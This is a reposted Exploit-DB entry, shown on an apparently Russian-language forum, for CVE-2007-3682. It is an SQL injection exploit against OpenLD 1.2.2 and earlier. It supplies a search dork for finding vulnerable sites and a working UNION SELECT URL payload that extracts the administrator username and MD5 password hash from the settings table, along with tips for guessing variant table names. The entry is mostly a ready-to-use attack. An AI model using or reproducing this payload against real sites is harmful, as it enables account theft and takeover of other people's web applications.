- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4167
- Проверка EDB
-
- Пройдено
- Автор
- CYPHERXERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3682
- Дата публикации
- 2007-07-10
Код:
--==+================================================================================+==--
--==+ OpenLD <= 1.2.2 SQL Injection Exploit +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--
NOTES:
The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.
DORK:
"Powered by OpenLD"
EXPLOITS:
http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--
# milw0rm.com [2007-07-10]- Источник
- www.exploit-db.com
